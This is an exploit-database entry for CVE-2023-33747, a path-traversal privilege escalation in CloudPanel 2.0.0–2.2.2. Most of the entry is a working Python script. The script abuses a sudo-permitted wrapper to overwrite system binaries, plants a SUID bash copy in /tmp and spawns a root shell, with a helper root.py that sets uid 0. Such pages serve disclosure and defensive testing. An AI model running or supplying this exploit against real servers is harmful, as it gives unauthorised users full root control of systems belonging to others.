CloudPanel 2.2.2 Privilege Escalation / Path Traversal

2023.06.07
Credit: EagleEye
Risk: Medium
Local: No
Remote: Yes

# Title : Privilege Escalation through path traversal # CVE ID : CVE-2023-33747 # Exploit Author : EagleEye # Github : https://github.com/EagleTube/CloudPanel/tree/main/CVE-2023-33747 # Version Affected : CloudPanel v2.0.0 - v2.2.2 # Vendor : CloudPanel.io # Date : 31/05/2023 , 12:00 PM # Step : Login as ssh as user, and run `python3 CVE-2023-33747_GetRoot.py` # Date : 06 June 2023 # CVE-2023-33747_GetRoot.py import os import subprocess def exec_command(command): process = subprocess.Popen(command.split(), stdout=subprocess.PIPE) output, error = process.communicate() def exploit(): print('[+] Overriding file to writable') exec_command('sudo /usr/bin/clpctlWrapper system:permissions:reset --files=777 --path=../../../../../../../../../../usr/bin/clpctlWrapper') print('[+] Backup clpctlWrapper into tmp...') exec_command('cp /usr/bin/clpctlWrapper /tmp/clpctlWrapper') print('[+] Replacing clpctlWrapper with cp...') exec_command('cp /bin/bash /tmp/bash') print('[+] Assigning suid to /tmp/bash...') exec_command('cp /bin/chown /usr/bin/clpctlWrapper') exec_command('sudo /usr/bin/clpctlWrapper root:root /tmp/bash') exec_command('cp /bin/chmod /usr/bin/clpctlWrapper') exec_command('sudo /usr/bin/clpctlWrapper 6755 /tmp/bash') exec_command('cp /tmp/clpctlWrapper /usr/bin/clpctlWrapper') print('[+] Popping root shell...') os.system('/tmp/bash -p -c "chown root:root /usr/bin/clpctlWrapper && chmod 0700 /usr/bin/clpctlWrapper && python3 root.py"') if __name__ == '__main__': exploit() # root.py import os os.setreuid(0,0) os.setregid(0,0)os.system('/bin/bash')


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top